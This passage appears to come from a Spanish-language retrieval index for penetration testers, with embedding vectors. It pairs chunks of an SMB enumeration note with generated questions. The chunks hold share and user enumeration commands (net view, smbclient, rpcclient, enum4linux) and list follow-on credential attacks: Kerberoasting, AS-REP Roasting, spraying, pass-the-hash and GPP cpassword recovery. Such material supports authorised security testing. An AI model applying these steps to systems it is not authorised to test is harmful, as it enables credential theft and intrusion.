-0.07284, 0.07957, -0.17871, 0.09225, -0.05985, 0.03648, 0.04615, 0.0148, 0.13792, -0.01282, 0.08045, -0.03803, -0.05916, -0.00949, 0.00914, -0.04237, 0.14814, -0.11044, 0.06489, 0.06102, -0.06711, 0.01431, 0.04907, -0.07199, -0.0906, 0.10062, -0.01118, 0.01912, -0.01866, 0.00736, 0.02649, -0.06723, -0.12851, 0.04447, -0.00816, -0.02969, -0.11648, 0.06745, -0.00334, -0.10256, 0.05486, 0.08853, -0.02913, 0.11023, 0.07315, 0.01236, 0.08629, 0.06121, -0.05093, -0.08222, 0.13301, -0.12459, 0.11727, -0.01462, -0.0894, -0.01238, -0.06722, 0.07116, 0.05762, -0.06084, -0.05098, -0.05972, -0.02837, 0.03786, -0.09073, -0.00731, 0.02826, -0.07037, 0.02389, 0.00949, 0.0878, 0.07475, -0.089, 0.00774, 0.15555, -0.06043, 0.01117, -0.08409, 0.00581, -0.03176, -0.04064, -0.09069, 0.01547, -0.05737, -0.02734, 0.03672, -0.07467, 0.10176, 0.08538, 0.03244, -0.01419, 0.0223, 0.03626, 0.04164, -0.02692, -0.04753, -0.02468, 0.0863, 0.00271, 0.01786, 0.00077, -0.01308, 0.06234, 0.05394, 0.00536, -0.05659, 0.01081, -0.05455, 0.00074, -0.03695, -0.01047, 0.06727, -0.04984, -0.04946, -0.02294, 0.0521, 0.08133, -0.03512, 0.10208, -0.04051, -0.0553, -0.01374, -0.01099, 0.02663, -0.05729, -0.00396, 0.00906, -0.10345, 0.07804, 0.00703, 0.0135, -0.05358, 0.01181, -0.02554, 0.02289, -0.03091, 0.00838, 0.01082, 0.02696, 0.04708, 0.01161, -0.01993, -0.08174, -0.07801, -0.02081, 0.0825, -0.05294, -0.12563, 0.02071, -0.04472, -0.07797, 0.09413, 0.06692, -0.09002, 0.03244, -0.00083, 0.10566, -0.00047, -0.05277, 0.03363, -0.04362, -0.01453, -0.02759, 0.02626, -0.01, 0.01343, -0.00156, 0.04688, 0.02056, 0.07456, -0.0132, 0.05503, -0.04752, -0.00339, 0.05634, 0.04975, 0.00791, 0.0072, 0.03597, -0.01667, -0.02812, 0.04361, 0.0206, 0.00232, -0.05516, -0.04163, -0.01795, -0.04483, 0.07777, -0.01048, -0.10485, -0.05554, -0.0132, -0.0702, 0.03542, -0.00212, -0.0901, -0.03885, -0.01657, 0.03737, -0.08278, -0.01229, 0.0363]} -{"tipo": "pregunta", "herramienta": "SMB", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/SMB.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Desde Windows\n```cmd\nnet view \\\\dc01 /all :: shares incl. ocultos. Admin shares: ADMIN$, C$, IPC$\n```", "indexar": "con quΓ© herramienta puedo listar los recursos de red de una mΓ‘quina especΓ­fica como dc01?", "v": [-0.02845, 0.04995, -0.03922, -0.14571, 0.01648, -0.08656, -0.10199, 0.03921, -0.0774, -0.04583, -0.07746, -0.13676, -0.04431, -0.2348, 0.06977, 0.04073, 0.03943, 0.00905, -0.05291, -0.09622, 0.04462, -0.14169, -0.16603, 0.02663, -0.01427, 0.04394, 0.08861, -0.07809, -0.23871, 0.04015, 0.03934, 0.12853, 0.03857, -0.11836, -0.1017, 0.02625, 0.00818, 0.11884, -0.05708, -0.02811, -0.03934, 0.03973, -0.12345, 0.07973, 0.04313, -0.04061, 0.00968, 0.019, -0.03318, 0.02203, -0.07695, -0.1071, -0.13647, -0.00291, -0.02286, -0.14593, 0.09451, -0.00699, -0.02135, -0.05692, -0.06527, 0.04192, -0.1117, -0.02786, -0.08203, 0.05449, -0.02096, -0.04611, -0.07137, 0.03221, -0.05833, 0.01035, 0.06556, -0.06274, 0.03248, 0.04346, 0.05869, 0.00332, 0.08189, -0.04766, -0.04327, 0.05197, -0.07783, -0.01446, -0.01199, -0.06072, 0.1637, -0.03646, 0.08432, -0.13557, -0.03312, 0.04324, -0.0346, -0.01302, 0.07333, -0.04319, 0.08916, 0.00213, -0.0163, 0.01028, 0.12175, -0.01426, -0.07479, 0.0778, 0.03304, 0.05845, 0.04985, -0.01707, -0.04094, -0.05199, 0.03107, -0.02391, 0.01803, 0.04394, -0.01092, 0.01075, -0.05848, 0.01314, -0.04719, -0.07512, -0.01738, 0.03447, -0.06498, -0.08401, 0.06602, -0.0358, -0.04336, 0.0979, 0.00235, -0.04809, -0.01052, -0.00016, -0.0686, -0.04782, -0.02595, -0.03283, 0.01385, -0.13127, -0.01964, -0.08213, 0.0052, 0.04736, -0.06101, -0.10057, 0.03804, 0.01572, 0.0912, -0.12506, -0.03407, 0.01073, 0.08063, -0.08208, 0.06199, 0.03322, -0.06224, 0.10877, 0.02676, 0.06865, -0.06953, 0.01455, -0.0889, -0.06241, -0.04702, 0.0323, -0.02274, 0.00856, 0.03388, 0.02522, 0.05073, 0.0193, 0.01209, -0.02533, 0.04653, 0.01017, -0.04842, -0.08857, -0.01749, -0.04485, -0.01118, -0.12234, -0.04215, 0.01302, -0.07042, -0.07649, 0.00022, -0.07548, -0.03635, -0.04603, 0.01, 0.02768, -0.02753, -0.00121, 0.02821, -0.06331, 0.02755, -0.01085, -0.03426, 0.02115, 0.02752, -0.02313, -0.09471, 0.00114, -0.02602, -0.02105, 0.02418, 0.08401, -0.04852, -0.00502, -0.05939, 0.05333, 0.07674, 0.03101, 0.05992, -0.01963, -0.07184, 0.00152, 0.01066, 0.007, -0.02664, -0.01157, 0.11162, -0.01775, 0.00904, 0.02865, 0.0338, 0.01008, 0.03415, 0.00668, 0.04292, 0.0292, 0.04168, -0.02365, -0.02443, -0.03864, -0.01387, -0.05935, 0.08693, 0.01836, -0.06256, 0.04483, 0.00028, 0.05723, -0.01386, -0.07398, -0.0333, -0.02379, -0.02628, 0.01086, -0.05235, -0.1013, -0.00677, -0.00132, 0.03593, -0.0189, 0.02386, -0.04005]} -{"tipo": "pregunta", "herramienta": "SMB", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/SMB.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Desde Windows\n```cmd\nnet view \\\\dc01 /all :: shares incl. ocultos. Admin shares: ADMIN$, C$, IPC$\n```", "indexar": "cual es una alternativa a la sintesis cmd net view para visualizar las particiones y carpetas ocultas de un servidor?", "v": [0.12421, -0.02009, -0.11664, -0.10909, -0.03282, -0.14175, 0.03635, -0.03691, 0.01531, -0.05187, -0.03544, -0.13643, -0.06419, 0.01681, 0.04193, 0.09632, 0.2125, -0.06483, 0.07874, -0.02592, -0.00781, -0.03303, 0.07743, 0.04902, -0.16781, 0.0794, 0.10217, 0.0029, -0.07687, -0.07584, -0.05453, 0.04892, -0.02758, 0.10914, 0.01372, -0.03679, -0.08884, 0.06196, -0.07528, -0.03646, -0.02485, 0.07187, -0.05416, 0.13388, -0.00507, -0.12661, -0.06935, 0.0498, 0.02004, -0.04603, -0.13908, -0.07401, -0.20375, -0.02984, 0.07175, -0.11246, 0.13018, -0.09463, 0.06856, 0.03338, -0.09856, 0.05189, 0.01158, 0.02698, 0.01447, -0.00049, -0.09909, -0.04205, -0.03994, 0.08602, -0.13927, 0.01302, 0.01284, -0.04627, -0.00994, 0.02283, -0.03306, -0.02137, 0.01737, 0.049, 0.06039, -0.04048, -0.07982, 0.11144, -0.09054, -0.13882, 0.01338, -0.04101, -0.09643, -0.06577, 0.03116, 0.03397, -0.08273, 0.14569, 0.0017, -0.0325, 0.1202, 0.029, -0.06363, -0.03196, 0.03405, 0.07511, -0.07931, 0.07471, -0.04928, 0.05088, -0.01306, -0.02019, -0.0166, 0.01968, 0.07852, 0.03726, 0.00305, 0.02749, 0.03294, -0.14389, 0.00035, -0.00408, -0.04215, 0.00219, -0.06112, -0.04404, -0.06928, 0.02488, -0.00245, -0.10455, 0.0573, 0.08624, -0.05645, 0.01956, -0.07014, -0.02821, -0.09383, -0.03625, -0.0981, -0.03495, 0.05226, -0.04988, 0.01682, -0.04343, 0.05932, 0.03092, -0.01239, -0.00798, 0.09301, 0.0296, 0.06552, -0.06817, -0.04183, 0.03736, 0.02914, 0.00499, -0.01992, -0.0037, -0.06506, 0.0396, -0.01444, -0.06126, -0.10103, 0.00903, 0.00889, -0.04955, 0.00347, -0.00713, 0.0034, -0.07657, -0.04164, 0.00329, -0.01533, 0.00999, -0.02646, 0.05214, -0.05662, -0.10046, -0.01667, -0.03495, 0.02251, -0.1132, 0.02617, 0.06305, -0.04424, 0.01464, -0.02686, -0.00588, -0.0344, -0.07709, 0.024, -0.02813, -0.04693, -0.01895, 0.0832, 0.02477, -0.09853, 0.06941, -0.02531, -0.0456, -0.00623, -0.07433, -0.00268, -0.01868, -0.12001, 0.02872, -0.02586, -0.1092, 0.00026, -0.01998, -0.04831, 0.03144, -0.06644, 0.06889, 0.02824, -0.01951, 0.05912, -0.04255, -0.01196, -0.00238, 0.05466, -0.04069, -0.0049, -0.0608, -0.01436, 0.00391, 0.04968, -0.02205, 0.05799, 0.04755, 0.00269, 0.05979, 0.05661, -0.03137, -0.03174, 0.02844, -0.01528, -0.01074, 0.02201, -0.03421, 0.00544, -0.04763, -0.03934, -0.05085, 0.03194, 0.06297, -0.01591, -0.07962, -0.03185, -0.05545, -0.07927, 0.01664, -0.02958, -0.07608, -0.04152, -0.01273, 0.0167, -0.05819, 0.033, -0.0537]} -{"tipo": "pregunta", "herramienta": "SMB", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/SMB.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Trampas\n- `smbclient -L` **trunca** comentarios β†’ usa `rpcclient netshareenumall` para el `remark` completo.\n- Usuarios UNIX locales (`S-1-22-1`) solo los pilla `enum4linux -a` (RID cycling), **no** `enumdomusers`.\n- Automatiza la red entera con Bucles bash sobre IPs.", "indexar": "cual es una herramienta para obtener todos los comentarios de las comparticiones SMB?", "v": [-0.1016, 0.07656, -0.057, -0.10513, 0.00309, -0.20851, -0.0901, -0.10779, -0.05486, -0.04334, -0.1417, 0.05402, 0.06741, -0.12978, 0.03325, 0.14779, 0.11129, -0.12349, -0.05032, 0.05419, 0.12045, 0.05203, -0.04793, -0.00567, -0.08796, -0.1018, 0.10888, -0.00524, -0.15607, 0.07738, 0.05154, -0.03273, 0.02875, -0.06129, -0.02176, -0.05797, -0.00018, 0.08265, -0.01746, 0.04628, 0.00485, -0.10421, -0.12446, 0.02667, 0.01405, -0.02409, -0.06864, 0.11571, -0.02068, 0.07837, -0.07391, -0.02981, -0.14001, 5e-05, -0.09809, -0.11923, 0.21238, -0.15192, -0.0293, -0.05499, -0.0625, 0.07028, -0.06437, -0.07014, 0.02003, -0.12835, -0.01841, -0.00315, -0.15605, 0.14856, -0.01473, 0.05233, 0.03448, -0.06644, 0.01541, 0.09083, -0.00709, 0.06709, 0.00762, 0.00851, 0.07545, -0.06556, 0.02201, 0.01868, -0.00101, -0.08465, 0.10868, -0.04109, -0.01285, -0.03278, -0.0622, 0.07025, -0.04976, 0.02863, -0.03912, -0.0134, 0.04956, -0.01153, 0.0184, 0.01884, 0.17693, -0.05641, -0.12266, 0.02606, -0.02139, 0.05777, -0.02473, -0.01016, -0.00425, 0.01124, 0.11239, 0.06138, 0.00685, 0.05386, -0.04604, 0.00446, -0.07844, -0.11478, -0.0289, -0.08511, 0.00804, 0.09817, -0.0873, -0.08698, 0.02608, -0.01056, -0.01694, 0.06288, -0.01284, -0.0338, -0.0435, -0.02074, -0.01132, 0.02355, -0.00338, -0.06238, 0.04475, -0.06242, -0.03702, -0.10005, 0.05725, -0.01812, -0.00611, -0.10922, -0.00619, -0.0044, -0.01581, -0.04125, -0.03099, -0.02892, 0.0488, 0.04627, 0.00932, -0.01809, 0.00725, 0.09413, -0.00857, -0.0069, -0.12887, 0.03392, -0.0978, -0.03615, 0.07262, -0.04573, 0.04748, -0.06049, 0.01256, -0.01093, 0.04626, 0.00446, 0.04615, 0.0277, 0.00015, -0.02321, 0.03059, -0.06765, -0.08018, -0.03676, 0.01516, -0.0526, -0.01584, 0.03634, -0.07168, 0.03282, 0.00623, -0.04308, 0.03732, 5e-05, -0.00536, -0.00249, 0.02805, 0.00961, -0.01168, -0.00539, -0.01839, -0.04089, -0.05777, -0.06641, 0.1085, -0.01977, -0.09804, -0.00093, -0.05606, -0.05563, 0.01599, 0.03785, -0.00722, -0.01246, -0.02214, 0.05928, 0.06491, 0.00606, 0.03564, -0.04632, -0.00453, -0.04344, 0.01542, 0.03155, 0.02348, -0.00746, 0.02782, 0.02732, 0.06168, 0.00199, -0.05235, 0.03199, -0.01041, 0.04445, 0.03569, 0.00392, 0.00317, -0.01161, -0.00297, -0.00236, 0.04141, -0.00349, 0.025, -0.03027, -0.0285, -0.03499, -0.02362, 0.02181, -0.00503, -0.02054, -0.08919, -0.01659, -0.02771, -0.03075, -0.03315, -0.09241, 0.02873, -0.02668, 0.07377, -0.02842, 0.03805, -0.01158]} -{"tipo": "pregunta", "herramienta": "SMB", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/SMB.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Trampas\n- `smbclient -L` **trunca** comentarios β†’ usa `rpcclient netshareenumall` para el `remark` completo.\n- Usuarios UNIX locales (`S-1-22-1`) solo los pilla `enum4linux -a` (RID cycling), **no** `enumdomusers`.\n- Automatiza la red entera con Bucles bash sobre IPs.", "indexar": "que programa sirve para enumerar usuarios locales en redes UNIX?", "v": [-0.14909, -0.03236, -0.17791, -0.20472, 0.00668, -0.07178, -0.13046, -0.11922, -0.04108, -0.1592, -0.09983, -0.13719, 0.01785, -0.11776, -0.00647, -0.11056, -0.03397, -0.02857, 0.18819, -0.07769, -0.06238, 0.07866, -0.07479, 0.0251, -0.03966, 0.03663, 0.02745, -0.20824, 0.03528, 0.0085, 0.06159, 0.00129, -0.04921, -0.06921, -0.01914, -0.05773, 0.01113, 0.08099, 0.02127, 0.09298, 0.15147, 0.02375, -0.15286, -0.09703, 0.12413, 0.15489, -0.04683, -0.05077, -0.00156, -0.0874, -0.04402, -0.01529, -0.1401, -0.03616, -0.04762, -0.08519, -0.02313, -0.11097, -0.10854, 0.02777, 0.01962, -0.13853, 0.03205, -0.00578, 0.02355, 0.01972, 0.00669, 0.0609, -0.07008, 0.02904, -0.03069, 0.07175, 0.0665, -0.11573, -0.03369, 0.10646, 0.00074, -0.0275, 0.06556, 0.01713, 0.0016, -0.01289, 0.01641, 0.00826, -0.06343, 0.01618, 0.0908, -0.09864, -0.0038, -0.01366, 0.00651, 0.02292, 0.01505, 0.01346, 0.10687, -0.0575, 0.09567, -0.01156, -0.00486, 0.0421, 0.0646, -0.02812, -0.09634, 0.0597, -0.00292, 0.03165, 0.03467, 0.03606, -0.0043, -0.06844, 0.13152, -0.02365, -0.0304, -0.00323, -0.08424, 0.01377, -0.04846, 0.01224, 0.06407, 0.0074, -0.02255, -0.03352, -0.00925, -0.01481, 0.07625, 0.04558, -0.00453, 0.08709, 0.03429, -0.00396, 0.03258, 0.00164, 0.01072, -0.01919, -0.09138, -0.08535, 0.01466, -0.01259, -0.05053, -0.02352, -0.02285, 0.04313, -0.07771, 0.003, 0.00146, 0.06704, 0.0219, -0.05275, -0.03068, 0.04044, 0.01747, -0.0085, -0.11435, 0.02402, -0.10369, 0.06308, -0.00612, -0.01519, -0.04757, 0.01389, 0.00012, -0.04778, 0.03391, -0.02278, -0.00135, -0.03201, -0.03641, 0.09124, 0.09544, 0.09027, -0.06142, 0.13077, 0.01405, -0.09434, -0.04792, 0.04694, 0.0015, -0.03151, -0.01055, 0.01735, -0.06846, -0.00843, 0.08237, 0.05098, -0.04509, -0.04882, 0.00077, 0.0362, -0.00838, -0.0142, -0.08076, -0.01383, 0.02884, 0.02831, 0.03627, -0.03533, -0.00345, 0.06565, 0.01904, -0.04732, -0.0574, -0.00207, 0.01562, 0.04965, 0.05055, 0.07884, -0.01988, -0.04633, 0.01069, 0.09707, -0.05791, -0.02634, -0.00946, 0.03554, 0.01301, -0.07658, 0.0659, -0.01497, 0.00733, 0.04601, -0.05187, -0.07899, -0.00917, 0.04616, 0.00425, 0.0029, -0.02913, -0.03712, 0.00254, -0.01023, 0.04617, -0.09478, -0.04754, -0.01231, -0.02621, -0.0907, -0.01537, 0.03364, -0.02046, -0.0515, -0.03817, 0.04351, -0.01282, -0.00875, -0.01367, -0.04406, -0.08108, 0.0079, 0.03051, 0.00658, -0.02293, 0.02669, 0.02267, 0.04101, -0.00726, 0.03052]} -{"tipo": "pregunta", "herramienta": "SMB", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/SMB.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Trampas\n- `smbclient -L` **trunca** comentarios β†’ usa `rpcclient netshareenumall` para el `remark` completo.\n- Usuarios UNIX locales (`S-1-22-1`) solo los pilla `enum4linux -a` (RID cycling), **no** `enumdomusers`.\n- Automatiza la red entera con Bucles bash sobre IPs.", "indexar": "como puedo automatizar la exploraciΓ³n de usuarios y recursos en toda mi red?", "v": [0.02017, 0.02627, -0.083, -0.18629, 0.00437, 0.05689, -0.06512, -0.05301, -0.11683, -0.10745, -0.14358, -0.22031, 0.12612, 0.00872, 0.07397, -0.03258, 0.01283, 0.11664, 0.01601, 0.02774, 0.06563, -0.12476, -0.06083, 0.03817, 0.00299, 0.108, 0.05981, -0.0904, -0.04403, 0.01539, 0.00184, 0.09588, -0.04135, -0.0054, -0.07408, -0.00608, 0.17402, 0.09129, -0.0424, -0.02324, -0.03702, 0.07447, -0.10598, 0.01205, 0.17866, 0.06294, -0.03056, -0.05571, -0.07599, -0.01806, -0.08884, -0.12336, -0.19466, -0.11017, 0.02964, -0.07899, 0.14628, -0.13371, -0.00437, -0.00363, -0.05151, -0.01243, -0.00495, 0.08513, -0.03262, -0.02182, 0.09151, 0.08034, -0.05934, 0.20015, -0.01311, 0.06427, -0.02855, -0.0023, 0.05245, 0.09229, -0.00565, -0.0296, 0.05605, -0.00103, -0.03801, 0.08228, -0.07561, -0.03907, -0.05847, -0.07758, 0.09476, -0.06235, 0.07265, -0.05143, -0.03755, -0.07886, 0.02785, 0.02265, -0.02019, 0.00108, 0.06876, -0.04734, -0.01884, 0.07058, -0.01865, 0.04655, -0.05195, 0.09966, 0.13509, 0.01952, 0.07925, -0.03208, 0.01688, -0.06242, 0.0206, -0.06015, 0.03492, -0.04561, 0.02642, 0.00079, -0.0139, -0.01504, -0.02016, -0.09471, -0.0363, -0.01451, -0.02226, -0.10309, 0.05134, -0.05825, 0.00672, 0.00291, 0.03601, -0.04968, 0.06604, 0.02806, -0.02969, -0.09583, -0.00309, -0.04515, -0.07844, -0.04254, -0.008, 0.02287, -0.05843, 0.0686, -0.0572, -0.103, 0.09965, 0.02439, 0.03095, -0.08661, 0.00501, -0.04815, -0.02859, -0.07297, 0.0008, 0.03147, 0.01217, 0.09741, 0.09865, 0.12979, -0.082, 0.01961, 0.01977, -0.01785, -0.055, -0.00075, -0.00644, -0.01027, -0.01494, -0.04376, -0.00587, -0.05405, 0.00631, 0.06248, 0.01658, -0.02471, 0.00436, -0.03561, 0.03047, -0.0339, 0.00653, -0.04805, 0.03687, -0.06093, -0.06954, -0.05441, -0.00698, -0.05692, 0.02185, -0.05042, 0.01689, -0.02063, -0.02264, -0.03372, 0.02514, 0.03561, 0.08022, 0.00522, 0.03157, 0.05741, -0.02747, -0.08337, 0.00141, 0.02996, -0.05542, -0.01636, -0.03603, 0.03455, 0.0513, 0.01436, 0.02975, -0.0154, 0.09369, 0.02843, 0.08873, -0.03309, -0.12115, -0.01329, 0.08599, -0.00785, -0.01344, -0.09912, 0.02857, 0.02715, -0.00027, 0.04454, 0.02221, 0.03226, 0.00622, -0.04579, -0.03046, -0.02647, -0.02764, 0.016, -0.04584, 0.0181, -0.01823, 0.00361, 0.04853, 0.03083, -0.03506, -0.03885, 0.00077, 0.07174, -0.00602, -0.04413, -0.01741, -0.01888, -0.06908, 0.01402, -0.03549, -0.00698, 0.01912, 0.02369, 0.03994, -0.01479, -0.0299, 0.03315]} -{"tipo": "pregunta", "herramienta": "SMB", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/SMB.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## SesiΓ³n nula β†’ siguiente paso\nUsuarios vΓ‘lidos β†’ AS-REP Roasting, Kerberoasting, spraying (Pass-the-Hash).\nShares con `Groups.xml` β†’ GPP cpassword.\n\nRelacionado: SNMP Β· Active Directory Β· OSCP MOC", "indexar": "quΓ© herramienta sirve para roasting de credenciales en dominios", "v": [0.13185, -0.05296, -0.05384, -0.03159, 0.12703, -0.04619, 0.06822, -0.02776, 0.00918, -0.05899, -0.08486, -0.05536, -0.02301, -0.21863, 0.09532, -0.00223, 0.15607, 0.05615, -0.06869, 0.01904, -0.11103, -0.13728, -0.14146, 0.03144, 0.0409, -0.05583, 0.06212, -0.09066, -0.09853, 0.22653, 0.03773, -0.05089, -0.01027, -0.02409, -0.15876, -0.08713, -0.09865, 0.08036, -0.01439, 0.08098, -0.01885, 0.01963, -0.06604, 0.04021, -0.06244, -0.0156, -0.09201, -0.09695, -0.01402, -0.01132, -0.00748, -0.17787, -0.05826, -0.05065, 0.09089, -0.00354, 0.16057, -0.17012, 0.03346, -0.07782, -0.14659, -0.04985, -0.0308, -0.05725, -0.03139, -0.09761, -0.03706, -0.0445, 0.00117, 0.03241, -0.03837, -0.01308, 0.10304, -0.00187, 0.01594, -0.07936, 0.08699, 0.03455, 0.05073, -0.07454, 0.0977, -0.07796, -0.05027, 0.00593, -0.03468, -0.12541, -0.03608, -0.06384, 0.06032, 0.01528, 0.04722, 0.11856, -0.03388, -0.00049, 0.07141, -0.04491, 0.06806, -0.04022, -0.05416, 0.00352, 0.13703, -0.00788, -0.11408, 0.09625, 0.03683, 0.04942, 0.02265, -0.10136, -0.00793, -0.02176, 0.06089, -0.00782, -0.06395, -0.00393, -0.00982, 0.11145, -0.06479, -0.05132, -0.0049, -0.04248, 0.00248, -0.02756, 0.00218, 0.04637, 0.01527, 0.03379, -0.10478, 0.0283, -0.07094, -0.16627, 0.02567, -0.07075, -0.07822, 0.07564, -0.00597, -0.02987, 0.06327, -0.1065, -0.08761, -0.06827, -0.01906, 0.01283, -0.06185, -0.07598, -0.04219, -0.01962, 0.02668, -0.06196, 0.03927, -0.08676, -0.02857, -0.06125, -0.04744, -0.00405, -0.02273, -0.01878, -0.09185, 0.00764, -0.0754, -0.01076, -0.06875, -0.06452, 0.05023, 0.01623, 0.0215, -0.02898, 0.05963, 0.05629, 0.08988, 0.06111, 0.0264, 0.01912, 0.00159, -0.00503, 0.03222, 0.00934, -0.06227, 0.04048, -0.0415, -0.05555, -0.01239, -0.04045, 0.01637, 0.04067, 0.00502, 0.05922, 0.02602, -0.04637, -0.01988, 0.01523, 0.01785, -0.00019, 0.01093, -0.03259, 0.03081, 0.02295, 0.00945, -0.04483, 0.00605, 0.00971, -0.05693, 0.00259, -0.04992, -0.00402, -0.00103, 0.0848, -0.01072, 0.01891, -0.01342, 0.0167, -0.00873, -0.01179, 0.04237, -0.02344, -0.012, 0.04607, -0.01142, 0.02128, -0.08684, -0.0664, 0.04149, -0.03632, -0.01487, -0.03383, 0.02604, 0.05603, 0.03672, -0.00863, -0.02265, -0.00104, 0.04384, -0.01138, -0.00497, 0.03363, 0.0112, -0.10355, 0.03358, -0.02396, -0.05032, 0.01485, -0.08778, 0.01181, 0.0423, -0.00645, -0.01169, -0.03973, -0.01331, 0.00897, -0.01067, -0.03415, -0.01721, -0.03191, 0.01386, -0.02019, -0.00129, -0.03559]} -{"tipo": "pregunta", "herramienta": "SMB", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/SMB.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## SesiΓ³n nula β†’ siguiente paso\nUsuarios vΓ‘lidos β†’ AS-REP Roasting, Kerberoasting, spraying (Pass-the-Hash).\nShares con `Groups.xml` β†’ GPP cpassword.\n\nRelacionado: SNMP Β· Active Directory Β· OSCP MOC", "indexar": "con quΓ© puedo montar un ataque de pass-the-hash usando grupos", "v": [-0.01655, 0.06518, -0.2248, -0.08534, -0.20974, 0.01152, -0.036, 0.06655, -0.10403, 0.0324, -0.0662, 0.00868, -0.04792, 0.08338, 0.06717, 0.00694, 0.06136, 0.05882, -0.00447, -0.04014, -0.07217, -0.03983, -0.03318, -0.063, -0.04086, 0.02775, -0.03918, 0.06605, -0.17116, -0.06453, 0.00388, -0.01532, -0.07808, 0.03722, -0.05045, -0.08323, -0.03517, 0.09435, 0.11158, 0.09671, -0.0903, 0.00389, -0.24392, -0.00257, 0.04472, -0.09611, -0.02685, 0.0184, 0.02505, -0.01691, 0.17854, 0.07581, -0.24839, -0.00678, -0.0683, -0.09655, 0.03714, -0.03493, -0.00296, 0.03096, -0.12788, 0.10994, -0.0348, 0.0519, 0.08848, -0.04993, -0.0119, 0.01008, -0.11651, 0.03942, 0.01931, -0.04492, -0.02848, 0.04605, 0.01991, 0.0654, 0.04298, 0.05952, 0.04671, 0.06122, 0.03415, 0.0055, 0.00993, -0.01461, -0.10029, -0.00256, 0.03937, -0.07362, -0.00975, 0.03061, 0.06269, 0.04004, 0.0585, -0.053, -0.04029, -0.07066, -0.01452, 0.0365, 0.00688, -0.05219, -0.0381, -0.02215, -0.11537, 0.21954, 0.06559, 0.01454, 0.0065, -0.0462, 0.06672, -0.07354, 0.04181, -0.05737, -0.09374, -0.04074, 0.05941, -0.09386, -0.03664, 0.05909, -0.03779, 0.03347, -0.0582, 0.07552, 0.01787, 0.03033, 0.02261, -0.03981, 0.07478, 0.07846, -0.12452, 0.01818, -0.01141, 0.02551, -0.02975, -0.01077, -0.03834, 0.05867, 0.01305, -0.07051, -0.05029, 0.0283, 0.04568, 0.08123, -0.03623, -0.00813, 0.01366, 0.06258, -0.02383, -0.05983, -0.06041, 0.05322, 0.04001, 0.03068, 0.01324, 0.04226, -0.06123, -0.05602, -0.00513, -0.06036, -0.03671, 0.11078, -0.05662, 0.04761, -0.06533, 0.02752, -0.02339, -0.00948, -0.00708, -0.06009, 0.07351, 0.03768, 0.03226, -0.04262, 0.08043, -0.01688, 0.09133, -0.04543, -0.07579, -0.00067, 0.04392, -0.00471, 0.03517, -0.0648, -0.02637, 0.01498, -0.02249, -0.02806, 0.02834, 0.08127, 0.07606, 0.04865, -0.05669, 0.04019, -0.00857, 0.04127, 0.01209, -0.04629, -0.027, -0.00189, 0.01861, -0.03659, 0.05042, -0.01673, 0.00246, 0.00073, 0.07516, 0.03269, -0.08167, 0.02088, 0.0788, 0.09126, 0.08036, 7e-05, 0.06086, -0.01625, -0.08445, 0.02823, 0.00508, 0.01474, -0.03645, 0.05164, 0.0279, 0.08307, 0.06965, 0.05647, 0.02326, -0.01112, -0.05846, -0.04987, 0.0308, 0.05326, -0.00606, -0.03253, -0.00531, -0.01241, 0.02921, -0.03743, 0.0092, 0.04463, -0.09151, 0.00335, 0.0592, 0.01404, -0.00297, -0.00997, -0.02432, -0.0307, -0.07634, 0.05951, -0.01725, -0.04693, -0.0403, 0.02361, -0.03651, -0.02964, 0.04938, -0.03106]} -{"tipo": "pregunta", "herramienta": "SMB", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/SMB.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## SesiΓ³n nula β†’ siguiente paso\nUsuarios vΓ‘lidos β†’ AS-REP Roasting, Kerberoasting, spraying (Pass-the-Hash).\nShares con `Groups.xml` β†’ GPP cpassword.\n\nRelacionado: SNMP Β· Active Directory Β· OSCP MOC", "indexar": "quΓ© programa me ayuda a obtener contraseΓ±as de servidores GPP", "v": [0.0197, 0.10368, -0.08041, -0.25683, 0.03015, -0.09593, 0.12129, -0.16649, -0.10575, -0.01078, -0.0194, 0.13324, -0.0153, -0.11723, -0.01684, -0.0207, 0.13598, -0.00673, 0.09538, 0.15996, -0.01942, 0.07984, 0.03278, -0.0728, -0.08684, 0.02711, 0.08435, -0.10262, -0.03643, -0.02086, 0.05896, -0.13989, -0.11553, -0.06477, -0.11154, 0.1673, 0.02197, 0.15301, 0.00198, 0.09007, 0.06897, -0.02957, -0.07963, -0.00407, 0.02314, -0.05326, 0.08333, 0.04255, 0.054, -0.06403, -0.16815, -0.03874, 0.00302, -0.11804, -0.08062, -0.0636, 0.02875, -0.10015, -0.12629, 0.0446, -0.14197, 0.05867, 0.00396, 0.05117, -0.02694, -0.05909, 0.0962, -0.01193, -0.13682, 0.09806, -0.09669, 0.00461, 0.00037, -0.04691, -0.02335, -0.00539, -0.01825, -0.07142, 0.03695, 0.03703, 0.00644, 0.06278, 0.005, 0.06523, -0.12371, -0.00433, 0.02516, 0.00681, 0.02156, -0.09923, 0.04949, 0.02429, -0.00584, 0.11908, -0.03919, -0.04965, 0.09019, -0.08561, -0.01498, 0.004, -0.00926, -0.02664, -0.05178, 0.05596, -0.06331, 0.06912, 0.06791, 0.00114, -0.0263, -0.03473, 0.06092, 0.01251, -0.02134, 0.01846, -0.01516, -0.0363, -0.00859, -0.0489, 0.02388, -0.03533, -0.07595, 0.05571, -0.00443, 0.09982, 0.10213, 0.08, 0.06755, 0.03571, -0.06134, -0.02401, 0.01575, -0.03288, -0.05378, -0.02638, -0.05075, 0.03255, 0.04194, -0.0698, -0.09841, -0.02664, 0.00468, -0.02939, 0.0264, 0.03589, 0.04138, 0.01025, 0.13317, -0.09499, 0.00904, 0.0035, 0.00372, -0.03014, -0.01161, 0.00078, -0.09094, -0.02229, -0.01267, -0.07306, -0.12709, 0.06811, -0.02484, 0.00818, -0.06013, 0.06568, -0.02904, -0.02006, 